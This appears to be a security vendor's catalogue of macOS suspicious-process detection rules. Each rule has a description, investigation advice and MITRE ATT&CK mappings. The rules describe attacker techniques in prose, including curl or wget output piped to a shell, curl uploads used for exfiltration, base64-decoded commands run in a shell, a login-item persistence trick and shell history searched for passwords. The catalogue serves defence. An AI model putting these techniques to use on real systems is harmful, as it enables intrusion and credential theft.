Mac Suspicious Process

These detections identify suspicious activity from process start records collected by the Insight Agent from macOS endpoints.

Attacker Technique - Curl Or WGet To External IP Reporting Server IP In URL

Description

This detection identifies the 'curl' or 'wget' utility being used to access a remote IP address web server and report in the IP address of the vulnerable system in the URL. Malicious actors use utilities, such as these to call back to systems they have access to in order to validate which systems the attack was successful against.

Recommendation

Examine the IP address that is being contacted. Determine if the activity is expected or otherwise benign behavior. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Ingress Tool Transfer - T1105
Attacker Technique - Curl or Wget To Public IP Address With Non Standard Port

Description

This detection identifies the 'curl' or 'wget' utility being used to access a remote IP address web server on a non standard port. Malicious actors often use utilities, such as these to download additional payloads after gaining access to a target resource.

Recommendation

Examine the IP address that is being contacted. Determine if the activity is expected or otherwise benign behavior. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Ingress Tool Transfer - T1105
Attacker Tools - Cobalt Strike Client Application - Mac

Description

This indicator is designed to detect the usage of the penetration testing/post-exploitation framework Cobalt Strike. This indicator is specific to Mac operating systems.

Recommendation

Investigate the process events to identify if this activity is authorized and expected within the client network.

MITRE ATT&CK Techniques

  • Obtain Capabilities - T1588
Attacker Tools - Cobalt Strike Client Update - Mac

Description

This indicator is designed to detect the usage of the penetration testing/post-exploitation framework Cobalt Strike. This indicator is specific to Mac operating systems.

Recommendation

Investigate the process events to identify if this activity is authorized and expected within the client network.

MITRE ATT&CK Techniques

  • Obtain Capabilities - T1588
macOS Suspicious Process - chmod & nohup

Description

This detection identifies a chmod executing followed by a file being executed with nohup in the same command. This has been observed in macOS malware, notably the Schlayer malware, as a method of execution.

Recommendation

Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Unix Shell - T1059.004
  • File and Directory Permissions Modification - T1222
macOS Suspicious Process - Killall Terminal

Description

This detection identifies the killall command being used to kill any instances of the macOS Terminal that are running. This may be done to stop an earlier stage of the malware from continuing to execute, or as an anti-analysis technique.

Recommendation

Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Disable or Modify Tools - T1562.001
macOS Suspicious Process - Tail Piping to Funzip

Description

This detection identifies the 'tail -c' command being used to output a specified number of bytes from a file, followed by that output being typed to the 'funzip' utility to decompress the data. This has been observed in macOS malware that will hide a zipped binary file at the end of a bash script, use tail to output only the zip file from the script file, decompress the file, and execute it.

Recommendation

Investigate the file that the 'tail' command is being used on. Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Deobfuscate/Decode Files or Information - T1140
Malicious Document - Microsoft Office for macOS spawns curl

Description

Crafted malicious documents targeting macOS have been observed using curl to download a second-stage payload from a remote server.

Additional information can be found at: https://labs.sentinelone.com/lazarus-apt-targets-mac-users-poisoned-word-document/

Recommendation

Examine the parent process that spawned the process in question, and any process that it may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Ingress Tool Transfer - T1105
  • Spearphishing Attachment - T1598.002
Malicious Document - Microsoft Office for macOS spawns Python

Description

This detection identifies Microsoft Office for macOS launching Python. Crafted malicious documents targeting macOS have been observed using Python to execute malicious code.

Recommendation

Examine the code passed to the Python process, and any process that it may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Python - T1059.006
  • Spearphishing Attachment - T1598.002
Malicious Document - Word for macOS spawns perl

Description

This detection identifies Word spawning perl. This has been observed in use by malicious documents targeting macOS by attacker groups including Ocean Lotus (APT32)

Recommendation

Examine the commands being passed to Perl, and any process that Perl may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Spearphishing Attachment - T1598.002
Malicious Document - Word for macOS spawns shell

Description

This detection identifies Word spawning sh, bash, or zsh. This has been observed in use by malicious documents targeting macOS by malicious groups including Ocean Lotus (APT32)

Recommendation

Determine what is being executed by the shell. Examine any processes spawned by Word. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Spearphishing Attachment - T1598.002
Malicious Document - Word or Excel for macOS opens slk file

Description

.slk files are a symbolic link format that dates back to Microsoft DOS. They are still supported in Office products, and can be used by a malicious actor to deliver macros that will be opened by Microsoft Word or Excel.

Recommendation

Examine any processes launched by Word or Excel, and any process that those processes may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Spearphishing Attachment - T1598.002
Suspicious MacOS Process - launchd starts Archive Utility

Description

To bypass defenses around creating launch agents, malicious actor can create a login item that points to a zip file in the ~/Library containing a folder named LaunchAgents which contains a launch agent plist file. Since this is neither a script or an executable, the operating system allows it, and the archive will be opened using the default handler on login. The default macOS Archive Utility, which is trusted by the operating system, will open the archive and write the plist file contained in the archive to ~/Libary/LaunchAgents, which is normally not writable by unprivileged users or untrusted binaries. This will cause whatever is specified in the plist file to launch at next login.

Additional information can be found at https://objective-see.com/blog/blog_0x4B.html

Recommendation

Inspect the created plist file. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Launchctl - T1569.001
Suspicious Process - base64 Output Piped to Shell

Description

This detection identifies the base64 utility being used to decode base64-encoded command line arguments before passing them on to a shell process such as bash for execution. Malicious actors may use base64 encoded payloads to avoid detection.

Recommendation

Investigate the contents of the base64 encoded string. Examine the parent process that spawned the process in question, and anything that the process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Deobfuscate/Decode Files or Information - T1140
Suspicious Process - Curl Downloading From Cloudfront URL

Description

This detection identifies the 'curl' command being used to download data from a CloudFront URL. Malicious actors have been observed using 'curl' to download second stage payloads from CloudFront.

Recommendation

Investigate the contents of the CloudFront URL. Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Web Service - T1102
  • Ingress Tool Transfer - T1105
Suspicious Process - Curl or WGet Pipes Output to Shell

Description

This detection identifies output from the Curl or WGet utility being piped to bash or another shell process. Malicious actors may use Curl or WGet to download additional malware, and pipe that malware to a shell for execution.

Recommendation

Investigate the URL that was downloaded from. Examine any additional processes spawned by the shell process that Curl spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Unix Shell - T1059.004
  • Ingress Tool Transfer - T1105
Suspicious Process - Curl Output Piped to Perl

Description

This detection identifies output from the Curl utility being piped to Perl. Malicious actors may use Curl to download additional malware, and pipe that malware to Perl for execution.

Recommendation

Investigate the URL that was downloaded from. Examine any additional processes spawned by the Perl process that Curl spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Ingress Tool Transfer - T1105
Suspicious Process - Curl Output Piped to Python

Description

This detection identifies output from the Curl utility being piped to Python. Malicious actors may use Curl to download additional malware, and pipe that malware to Python for execution.

Recommendation

Investigate the URL that was downloaded from. Examine any additional processes spawned by the Python process that Curl spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Python - T1059.006
  • Ingress Tool Transfer - T1105
Suspicious Process - curl --upload-file

Description

Malware has been observed using the curl --uploadfile command with no specified username to exfiltrate data to an attacker-controlled server.

This activity has specifically been identified in the CookieMiner malware for macOS: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/

Recommendation

Examine the parent process that spawned the process in question, and any process that it may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041
  • Exfiltration Over Web Service - T1567
Suspicious Process - DazzleSpy Process Name

Description

This detection identifies execution a binary named 'softwareupdate' from a '.local' directory. This is associated with the Dazzlespy family of malware.

Recommendation

Examine the binary in question. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Masquerading - T1036
  • Signed Binary Proxy Execution - T1218
Suspicious Process - Grepping Shell History

Description

This detection identifies the Grep command being used to search the contents of the shell history file. A malicious actor may do this in order to identify sensitive information such as passwords, or targets for lateral movement.

Recommendation

Examine the parent process that spawned the process in question, and anything that the process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Bash History - T1552.003
Suspicious Process - macOS Curl -f0l

Description

This detection identifies Curl being used with the -f0l flags on macOS. Use of Curl with this combination of flags is indicative of the Shlayer malware.

Recommendation

Investigate the host that was contacted, and any files downloaded from it. Examine the parent process that spawned the process in question, and anything that the process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Web Protocols - T1071.001
  • Ingress Tool Transfer - T1105
Suspicious Process - macOS Decoding File with OpenSLL Base64

Description

This detection identifies OpenSLL being used to decode base64 payloads on a macOS system. This may be done by malware that targets macOS in order to decode obfuscated payloads.

Recommendation

Attempt to decode and review the base64-encoded string or file. Examine the parent process that spawned the process in question, and anything that the process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Deobfuscate/Decode Files or Information - T1140
Suspicious Process - macOS UpdateAgent Curl Command Pattern

Description

This detection identifies the pattern '--connect-timeout 900' in a Curl command. This specific pattern has been observed in the UpdateAgent macOS malware. Additional details can be found from Microsoft: https://twitter.com/MsftSecIntel/status/1451279679059488773

Recommendation

Investigate the domain being contacted in the Curl command. Examine the parent process that spawned the process in question, and anything that the process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Ingress Tool Transfer - T1105
Suspicious Process - Office for macOS Launching OSAScript

Description

This detection identifies Microsoft Office processes launching OSAScript. OSAScript is a command line utility for executing AppleScript, which attackers may use for malicious purposes.

Recommendation

Attempt to identify the document that caused this activity to occur. Investigate the contents of the AppleScript being run. Examine any processes that may have been launched by OSAScript. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • AppleScript - T1059.002
  • Spearphishing Attachment - T1566.001
Suspicious Process - Silver Sparrow Filenames

Description

This detection identifies filenames known to be used by the SilverSparrow malware for macOS.

More information can be found at https://redcanary.com/blog/clipping-silver-sparrows-wings/

Recommendation

Examine the parent process that spawned the process in question, and any process that it may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

Suspicious Process - SysJoker Process Names

Description

This detection identifies process names identified as part of the SysJoker malware family. SysJoker is a multi-platform backdoor that masquerades as a system update.

Recommendation

Examine the parent process that spawned the process in question, and anything that the process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Masquerading - T1036
Suspicious Process - Viewing or Deleting macOS Quarantine Events

Description

This detection identifies SQL being used to read the contents of the macOS quarantine events database. Malicious programs have been observed doing this in order to view the URL they were downloaded from.

Recommendation

Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

Suspicious Process - WGet Output Piped to Bash

Description

This detection identifies output from the WGet utility being piped to bash or another shell process. Malicious actors may use WGet to download additional malware, and pipe that malware to bash for execution.

Recommendation

Investigate the URL that was downloaded from.Examine any additional processes spawned by the bash process that WGet spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Ingress Tool Transfer - T1105
Suspicious Process - Wget Output Piped to Perl

Description

This detection identifies output from the WGet utility being piped to Perl. Malicious actors may use WGet to download additional malware, and pipe that malware to Perl for execution.

Recommendation

Investigate the URL that was downloaded from. Examine any additional processes spawned by the Perl process that WGet spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Ingress Tool Transfer - T1105
Suspicious Process - WGet Output Piped to Python

Description

This detection identifies output from the WGet utility being piped to Python. Malicious actors may use WGet to download additional malware, and pipe that malware to Python for execution.

Recommendation

Investigate the URL that was downloaded from. Examine any additional processes spawned by the Python process that WGet spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Ingress Tool Transfer - T1105